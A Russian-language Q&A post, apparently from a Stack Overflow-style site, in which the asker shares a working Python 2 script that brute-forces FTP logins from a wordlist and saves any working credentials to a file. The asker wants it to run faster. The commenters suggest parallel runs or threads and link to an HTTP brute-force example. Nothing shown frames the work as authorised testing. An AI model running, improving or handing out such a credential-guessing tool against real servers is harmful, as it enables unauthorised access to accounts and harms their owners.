# Как увеличить скорость работы сценария?

Tags: python, python-2.x, ftp, python-2.7

Я пишу программу для подбора паролей к FTP сервису. Но у меня на перебор шести паролей уходит около 15 секунд. Как я могу ускорить работу сценария?
Вот код:

```
# -*- coding: utf-8 -*-
import ftplib
import argparse
import socket

parser = argparse.ArgumentParser(description='Brutforcer ftp ssh')
parser.add_argument('-s', help = 'service')
parser.add_argument('-i', help = 'host')
parser.add_argument('-l', help = 'login')
parser.add_argument('-w', help = 'wordlist')
args = parser.parse_args()
hostt = args.i
service = args.s
login = args.l
wordlist = args.w


def SFTP(hostt,login,r):
    host = hostt
    ftp_user = login
    ftp_password = r
    con = ftplib.FTP(host, ftp_user, ftp_password)
    con.close 




if service == 'ftp':
    handle = open(wordlist)

    for r in handle:
        try:
            try:
                SFTP(hostt,login,r)
                goodd = open('good.txt','w')
                #goodd.write('----------------')
                #goodd.write('\n')
                goodd.write('Current Service =>')
                goodd.write(service)
                goodd.write('\n')
                #goodd.write('----------------')
                goodd.write('Current Host =>')
                goodd.write(hostt)
                goodd.write('\n')
                #goodd.write('----------------')
                goodd.write('Current Login =>')
                goodd.write(login)
                goodd.write('\n')
                #goodd.write('----------------')
                goodd.write('Current Password =>')
                goodd.write(r)
                goodd.write('\n')
                #goodd.write('----------------')
                exit()
            except ftplib.error_perm:
                continue
        except socket.error:
            logs = open('log.txt','w')
            logs.write('host unavailable')
            exit()
```

Comment: запустить два скрипта в параллель. Но это не гарантия. Вполне может быть, что сервер просто ограничивает скорость - и тут только машина времени поможет.

Comment: Вы можете попытаться переписать сценарий для работы в несколько потоков. Но возможно сервер просто не примет соединения из-за ограничения

Comment: связанный вопрос: [Brute force HTTP with Python](https://codereview.stackexchange.com/a/12661/6143) (по ссылке в ответе пример кода)